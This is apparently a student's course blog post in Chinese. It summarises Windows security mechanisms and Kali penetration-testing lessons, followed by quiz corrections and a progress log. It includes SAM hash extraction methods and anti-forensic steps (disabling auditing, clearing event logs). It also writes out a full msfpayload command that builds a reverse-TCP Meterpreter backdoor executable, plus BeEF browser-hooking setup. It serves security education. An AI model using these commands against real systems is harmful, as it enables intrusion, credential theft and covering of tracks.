课本学习内容总结
第7章 Windows操作系统安全攻防
windows操作系统基本结构示意图
windows操作系统内核实现的核心机制有:
- Windows进程和线程管理机制
- Windows内存管理机制(Windows的虚拟内存空间分为系统核心内存区与用户内存区间两部分,系统核心内存用于映射内核、HAL、Win32k.sys等内核执行模块,并存储内核内存对象,对于内核中运行的特权代码,则可通过DKOM技术来进行枚举和操纵)、
- Windows文件管理机制(NTFS)、
- Windows注册表管理机制(注册表中的系统自启动挂接点上注册的应用软件可以随系统引导而自动运行,因此也是很多恶意代码及流氓软件普遍的攻击目标)、
- Windows的网络机制(从OSI网络参考模型的物理层到应用层,各层上对应的Windows网络组件模块包括如下: ①各层网卡硬件的设备驱动程序,处于OSI参考模型的物理层 ②NDIS库及miniport驱动程序,位于OSI链路层 ③TDI,对应OSI网络层与传输层 ④网络APIDLL及TDI客户端,对应OSI会话层与表示层 ⑤网络应用程序与服务进程,对应OSI应用层)。
Windows授权与访问控制机制
Windows的授权与访问控制机制是基于引用监控器模型,由内核中的SRM模块与用户态的LSASS服务共同来实施。
在Windows服务器操作系统中,用户可以执行内建的whoami命令来查看当前用户的访问令牌信息。 Windows对于系统中所有需保护的资源都抽象成对象,具体类型包括文件、目录、注册表键值、内核对象、同步对象、私有对象、管道、内存、通信接口等,而对每个对象会关联一个SD安全描述符. 对象安全描述符由如下主要属性组成:Owner SID、Group SID、DACL自主访问控制列表、SACL系统审计访问控制列表。Windows 远程安全攻防技术
Windows远程攻防技术可以分为以下几大类:远程口令猜测与破解攻击、攻击Windows网络服务、攻击Windows客户端及用户。
Windows系统上的安全漏洞生命周期:漏洞发现与披露、渗透测试与利用攻击、漏洞修补等。Windows的其他安全机制
身份认证、授权与访问控制以及安全审计是三个基本安全功能。
保护Windows系统安全稳定运行最为关键的三项安全措施——防火墙、补丁自动更新以及病毒防护。 除安全中心之外,Windows的安全特性还包括IPSec加密与验证机制、EFS加密文件系统、Windows文件保护机制、捆绑的IE浏览器所提供的隐私保护与浏览安全保护机制等Windows系统口令字密文提取技术
在本地获取口令字密文的主要包括如下三种途径:
①从另一种操作系统启动后拷贝文件系统中的口令密文文件 ②利用硬盘修复工具包中的rdisk工具,执行“rdisk/s-”命令创建SAM备份文件副本 ③使用pwdumpX系列工具直接从SAM文件或活动目录中提取口令字密文。Windows消踪灭迹
①关闭审计功能(Windows Resource Kit工具包里的auditpol程序可以让他们轻易地关闭审计功能)
②清理事件日志(使用Event Viewer事件查看器来打开、读取和清除这台主机上的事件日志)视频学习总结
Kali漏洞利用之检索与利用
漏洞检索工具:Exploit Datebase>searchsploit
检索wordpass的漏洞,可以看到对应的文件地址 通过相对目录进入到文件对应的地址 cat查看文件内容Kali漏洞之Metasploit基础
1、启动服务
在Kali中使用metasploit,需要先启动Postgre
SQL数据库服务和metasploit服务,然后就可以完整的利用msf数据库查询exploit和记录。service postgresql startservice metasploit start
如果 不想每次开机都手动启动服务,可以配置随系统启动
update-rc.d postgresql enable update-rc.d metasploit enable2、路径介绍
Kali中msf的路径为/usr/share/metasploit-framework
Auxiliary:辅助模块
encoders:供msfencode编码工具使用,具体可以使用msfencode -l。exploits:攻击模块,每个介绍msf的文章都会提到那个ms08_067_metapi,它就在这个目录。
payloads:这里面列出的是攻击载荷,也就是攻击成功后执行的代码,比如我们常设置的windows/meterpreter/reverse_tcp就在这个文件夹下。
post:后渗透阶段模块,在获得meterpreter的shell之后可以使用的攻击代码。比如常用的hashdump、arp_scanner就在这里。
3、基本命令
msfpayload:用来生成payload或者shellcode。
搜索的时候可以用msfpayload -l | grep "windows"这样的命令查询。
-o 选项可以列出payload所需的参数
msfencode:msf中的编码器,早期为了编码绕过AV,现在常用msfpayload与它编码避免exploit的坏字符串。
msfconsole:开启metasploit的console
发现漏洞 使用命令nmap -sV 192.168.1.124
使用set设置参数
Kali漏洞利用之Meterpreter介绍
Meterpreter是metasploit框架中的一个扩展模块,作为溢出成功以后的攻击载荷使用,攻击载荷在溢出攻击成功以后给我们返回一个控制通道。使用它作为攻击载荷能够获得目标系统的一个meterpreter shell链接。
Meterpreter作为后渗透模块有多种类型,并且命令由核心命令和扩展库命令组成,极大的丰富了攻击方式。其有很多有用的功能,如添加一个用户、隐藏一些东西、打开shell、得到用户密码、上传下载远程主机文件、运行cmd.exe、捕捉屏幕、得到远程控制权、捕获按键信息、清楚应用程序、显示远程主机的系统信息、显示远程机器的网络接口和IP地址等信息。
常用的命令:
background:将当前会话放置后台
load/use:加载模块
Interact:切换进一个信道
migrate:迁移进程
run:执行一个已有的模块,这里要说的是输入run后按两下tab,会列出所有的已有的脚本,常用的有autoroute,hashdump,arp_scanner,multi_inject等
Resource:执行一个已有的rc脚本常用的Meterpreter类型为:payload/windows/meterpreter/reverse_tcp
针对windows操作系统,反向连接shell,使用起来比较稳定。
1、生成Meterpreter后门
命令:msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.1.123 LPORT=2333 R | msfencode -t exe -c 5 > /root/door.exe
Kali漏洞利用之BeFF
1、命令行下启动Beef
此时浏览器自动打开页面
使用默认用户名beef与默认密码beef登录3、HOOK持续的时间为关闭测试页面为止,在此期间,相当于被控制了,可以发送攻击命令,在Commands模块,我们可以完成很多任务:
其中,4种颜色分别表示:
绿色:该攻击模块可用,且隐蔽性强
灰色:该攻击模块可用,但隐蔽性差
橙色:该用户模块是否可用还有待验证
红色:该攻击模块不可用
4、例如,选取MISC下的Raw JavaScript模块作为测试用例,右端表格有该模块的详细说明,以及一些可用的参数等。输入JavaScript code,点击Excute进行攻击。
6、BeFF默认是不加载Metasploit的,如果要使用Metasploit丰富的攻击模块,需要做些配置。
修改/usr/share/beef-xss/config.yaml中的metasploit 一行为true保证此处IP等信息设置正确(不适用127.0.0.1,需使用本机IP),并修改Custom路径
配置好后,打开msfconsole,运行命令:
load msgrpc ServerHost=192.168.1.124 Pass=abc123上周错题总结
1、下面哪些Linux 命令可以ASCII码和16进制单字节方法输出Hello.java的内容?
od -tcx1 Hello.javaod -tc -tx1 Hello.java
2、Netwox可以产生的数据报文有(IP、TCP、UDP)
3、中间人攻击可以破坏信息的机密性和完整性。 4、评估IDS的参数中,捕获的攻击和全部攻击之比为(检测率) 5、netfilter/iptables的规则表中,可以进行源IP和端口转换的是(nat表) 6、防火墙部署方式中,不能实现网络层和应用层双重安全的是?包过滤路由器、双宿主堡垒主机学习进度条
学习时间(新增/累计) | 博客量(新增/累计) | 重要成长 | |
---|---|---|---|
目标 | 400小时 | 30篇 | |
第1周 | 15/15 | 1/1 | linux基础知识 |
第2周 | 20/35 | 2/3 | 安全工具、环境搭建 |
第3周 | 15/50 | 2/5 | Nma使用 |
第4周 | 15/65 | 1/6 | |
第5周 | 15/80 | 1/7 | |
第6周 | 15/95 | 1/8 | |
第7周 | 12/107 | 1/9 |